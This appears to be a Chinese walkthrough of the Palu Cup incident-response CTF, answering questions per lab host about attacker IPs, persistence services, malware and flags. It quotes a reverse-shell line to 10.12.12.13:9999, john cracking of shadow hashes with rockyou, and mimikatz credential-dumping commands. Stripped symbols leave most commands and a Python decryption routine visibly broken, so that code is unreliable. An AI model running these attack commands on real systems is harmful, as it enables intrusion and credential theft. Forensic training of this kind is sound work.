帕鲁杯第二届应急响应:jumpserver,waf,mysql,sshserver,server01,Palu03,Palu02,每个靶机的漏洞总结 一、题目描述1.提交堡垒机中留下的flag2.提交waf中隐藏的flag3.提交mysql中留下的flag4.提交攻击者的攻击IP5.提交攻击者的最早攻击时间6.提交web服务泄露的关键文件名7.提交泄露的邮箱地址作为flag进行提交8.提交立足点服务器ip地址9.提交攻击者使用的提权用户密码10.提交攻击者留下的的文件内容11.提交权限维持方法服务的名称12.提交攻击者攻击恶意服务器连接地址13.找到系统中被劫持的程序程序名14.找到系统中存在信息泄露的服务运行端口15.提交Parloo公司项目经理的身份证号16.提交存在危险功能的操作系统路径17.提交进源机器中恶意程序的MD5作为flag进行提交18.提交攻击者留下的恶意账户名称md5后作为flag进行提交19.提交内部群中留下的flag并提交20.请提交攻击者使用维护页面获取到的敏感内容21.提交获取敏感内容IP的第一次执行命令时间22.提交攻击者使用的恶意ip和端口23.提交重要数据的明文内容24.提交恶意维权软件的名称25.提交恶意程序的外联地址26.提交攻击者使用的恶意dnslog域名27.提交寻找反序列化漏洞的端口28.提交web服务泄露的密钥29.提交攻击者开始攻击的时间30.提交攻击者在server中留下的账户密码31.提交攻击者维权方法的名称32.提交攻击者留下的木马md533.提交攻击者留下的溯源信息34.提交攻击者的githubID35.提交攻击者在github下留下的的内容36.提交恶意用户的数量37.提交恶意用户的默认密码38.提交业务数据中攻击者留下的信息39.提交私人git仓库中留下的内容40.提交存在在mysql服务器中的恶意程序的MD541.提交恶意程序中模拟c2通信的函数名称42.提交恶意程序创建隐藏文件的名称43.提交恶意程序中模拟权限提升的函数44.提交被钓鱼上线的用户名45.提交恶意程序的所在路径46.分析恶意程序的反连地址47.提交恶意c2的服务器登录的账号密码二根据靶机存在的漏洞排序(1)jumpserver1.堡垒机中的提交堡垒机中留下的flag在标签中(2)waf2.提交WAF中隐藏的FLAG在身份认证中随便输入点击配置就发现存在的flag4.提交攻击者的攻击IP注意是攻击查看攻击防护中的攻击看见有1108107进行攻击108是sshserver服务被控制后的攻击最早就算107进行攻击可以看出是1075.提交攻击者最早攻击的时间Palu{2025-05-05-00:04:40}看攻击事件中第一个107的事件或者看攻击中攻击未拦截的第一个6.web服务泄露的关键文件名第一种就是下载总的日志搜200返回看请求那些敏感信息2就算看路由里面的配置发现关键的txt文件7.题解泄露的邮箱地址访问泄露文件看见其中的地址http://192.168.20.102/bak/key.txt8.提交立足点服务器ip地址看见107先攻击后续108一直攻击可能被攻陷成为中间攻击靶机29.提交攻击者开始攻击的时间看waf日志里面[13/May/2025:16:45:19 0000](3)mysql3.提交mysql中留下的flag得下一个软件连接靶机本地没mysql服务端40.提交存在在mysql服务器中的恶意程序的MD5作为flag进行提交ba7c9fc1ff58b48d0df5c88d2fcc5cd141.提交恶意程序中模拟c2通信的函数名称作为flag进行提交登录root查看命令这个靶机因该是root权限被攻破不用输入密码可以转换把这个提取到home里面ida分析sudo cp /root/.a /home/ubuntIDA反汇编F5simulate_network_communication42.提交恶意程序创建隐藏文件的名称作为flag提交依旧IDA追踪查看create_hidden_file();函数得到文件隐藏名称。/tmp/.malware_log.txt43.提交恶意程序中模拟权限提升的函数作为flag进行提交simulate_privilege_escalation(4)sshserver9.提交攻击者使用的提权用户密码cat /etc/shadow 记得提权palu{parloo/parloo}$y$j9T$bLuVAsrL.71gbi6NQPhI/$lpN9vHI0MYs/YL19ERrpaRpdrc37f5ya520xe896iCjohn --wordlist/usr/share/wordlists/rockyou.txt hash.txtjohn --show hash.txt10.提交攻击者留下的的文件内容直接去parloo用户下找11.提交权限维持方法服务的名称ss -anutp查看当前系统所有的网络连接、端口监听状态以及这些连接对应的进程。systemctl status 811 822查看 PID 为822和811的进程对应的 systemd 服务状态。提权才能看见uid12.提交攻击者攻击恶意服务器连接地址查看网络连接时候暴露了反连的地址ss -anutp13.找到系统中被劫持的程序程序名/usr/bin 是什么它是 Linux 系统里存放绝大多数用户级可执行程序的默认目录像 id、ls、cat 这些命令本体都在这里ls -lt /usr/bin | head -n 10ls -lt按修改时间从新到旧排序文件-l 显示详情-t 按时间排序。head -n 10只显示前 10 个文件。所以这条命令的作用是列出 /usr/bin 里最近被修改过的 10 个文件帮你快速定位被篡改的程序。(5)server0114.找到系统中存在信息泄露的服务运行端口作为flag:查看提供的路径发现报错扫描一下靶机端口发现其中一个身份信息泄露{C:\Users\xiaonmap 192.168.20.103Starting Nmap 7.94 ( https://nmap.org ) at 2026-05-20 20:14 中国标准时间Nmap scan report for 192.168.20.103Host is up (0.0048s latency).Not shown: 992 closed tcp ports (reset)PORT STATE SERVICE22/tcp open ssh80/tcp open http222/tcp open rsh-spx443/tcp open https3000/tcp open ppp8080/tcp open http-proxy8081/tcp open blackice-icecap9999/tcp open abyssMAC Address: 00:0C:29:0A:A9:C9 (VMware)}15.提交Parloo公司项目经理的身份证号作为flag提交31010519851212345616.提交存在危险功能的操作系统路径作为flag提交去3000的git文档看敏感信息发现/admin/parloo用8080端口房屋内发现url的命令执行20.请提交攻击者使用维护页面获取到的敏感内容作为flag进行提交第一种就是登录进入看用户的历史记录.bash_history或者根据暴露的3000的日志名称搜索日志内容21.交获取敏感内容IP的第一次执行命令时间作为flag进行提交cat /var/log/parloo/command.log | grep 192.168.20.1直接搜匹配22.提交攻击者使用的恶意ip和端口flag格式为palu{xx.xx.xx.xx:xxxx}cat /var/log/parloo/command.log | grep 192.168.20.1bash -i /dev/tcp/10.12.12.13/9999 01kali的john -formatcrypt 1.txt1.txt保存$y$j9T$RlIs4rqy6D2PI46ntcuwZ0$WFD6WgX3XC4zp/5Y.Jq9yLcfhHK5Rdg6IeDq2Rrl79130.提交攻击者在server中留下的账户密码作为flag进行提交去cat /etc/shadow sudo提权parloohhack,123456Echo -n “$y$j9T$RlIs4rqy6D2PI46ntcuwZ0$WFD6WgX3XC4zp/5Y.Jq9yLcfhHK5Rdg6IeDq2Rrl791” hash.txtJohn -formatcrypt hash.txt31.提交攻击者维权方法的名称作为flag进行提交/home/parloohack/python3.3.py使用systemctl list-units --typeservice --all 来查看所有隐藏的进程32.留下的木马md5后作为flag提交parloohackubuntu:~$ md5sum aa4123940b3911556d4bf79196cc008bf4 aaparloohackubuntu:~$39.提交私人git仓库中留下的内容作为flag进行提交cGFsdXtGTzY1U3J1dVR1a2RwQlM1fQ登录server01看私有数据库然后利用数据库改admin的信息登录admin看见palu的里面有一个base64加密的(6)Palu0317.提交进源机器中恶意程序的MD5作为flag进行提交进入直接弹窗可能是恶意程序拖到桌面certutil -hashfile svhost.exe.exe MD518.提交攻击者留下的恶意账户名称md5后作为flag进行提交就算hack19.提交内部群中留下的flag并提交:parlo群子怡说了一个flag23.提交重要数据的内容作为flag提交去parloo3找重要数据然后去git里面登录hack有数据库直接替换新建的账号的密码然后爆破密码跑这个def custom_decrypt(ciphertext, key):decrypted []key_bytes [ord(c) for c in key]for i in range(0, len(ciphertext), 2):hex_byte ciphertext[i:i 2]substituted int(hex_byte, 16)xored ((substituted 0x0F) 4) | ((substituted 0xF0) 4)xor_key key_bytes[(i // 2) % len(key_bytes)]shifted xored ^ xor_keyoriginal_char_code shifted - ((i // 2) % 5 1)decrypted.append(chr(original_char_code))return .join(decrypted)key MySecretKeyciphertext c3a1c3c13e326020c3919093e1260525045eplaintext custom_decrypt(ciphertext, key)print(plaintext)24.提交恶意维权软件的名称作为flag进行提交就是之前的svhost25.提交恶意程序的外联地址用everything扫描从时间找到比如py的第三方图标的用pyinstxtractor提取 出一个恶意程序1.pyc再反编译找地址26.提交攻击这使用的恶意dnslog域名作为flag进行提交np85qqde.requestrepo.comcat /var/log/parloo/command.log | grep 192.168.20.1这个里面找历史记录27.提交寻找反序列化漏洞的端口作为flag进行提交9999要找反序列化漏洞要在网站等应用中找先看看webserver的网站吧但是发现它们两个都是808180静态网站不会用到序列化排除。再看看waf给出的网站列表看看102:9999的情况尝试登录一下没看出POST做了什么反序列化抓个包试试。结果也是没有反序列化。再看看雷池WAF中的攻击日志过滤未拦截的反序列化根据相应内容只有9999这个302重定向了。28.提交web服务泄露的密钥作为flag进行提交heapdump下两个工具(7)Palu0233.提交攻击者留下的溯源信息作为flag进行提交其他机器都没有谷歌浏览器唯独PC2有翻设置和历史翻到保存密码34.提交攻击者的githubID作为flag进行提交用QQ搜是一个QQ号码但是加不了好友也没有签名用空间看一下帕鲁的QQ空间得到Palu{ParlooSEc},有问题的是他的只能看一年以内的35.提交攻击者在github下留下的的内容作为flag进行提交也是需要联网才能搜索到的palu{s5o3WkX33hptyJjk}44.提交被钓鱼上线的用户名作为flag进行提交发给子怡的点击后子怡就算上当的45.提交恶意程序的所在路径作为flag进行提交\..\..\..\..\parloo-沉沉46.分析恶意程序的反连地址作为flag进行提交地址意思就是可能使用goole进入看看历史47.101.213.15347.提交恶意c2的服务器登录的账号密码作为flag进行提交。flag格式为palu{username/password}adminadminqwer(8)Palu0136.提交恶意用户的数量作为flag进行提交net user37.提交恶意用户的默认密码作为flag进行提交privilege::debugsekurlsa::logonpasswords //失败token::elevate //提升权限lsadump::sam //抓取NTLM的hash密码12345638.提交业务数据中攻击者留下的信息作为flag进行提交之前在数据库中还有一个flag提交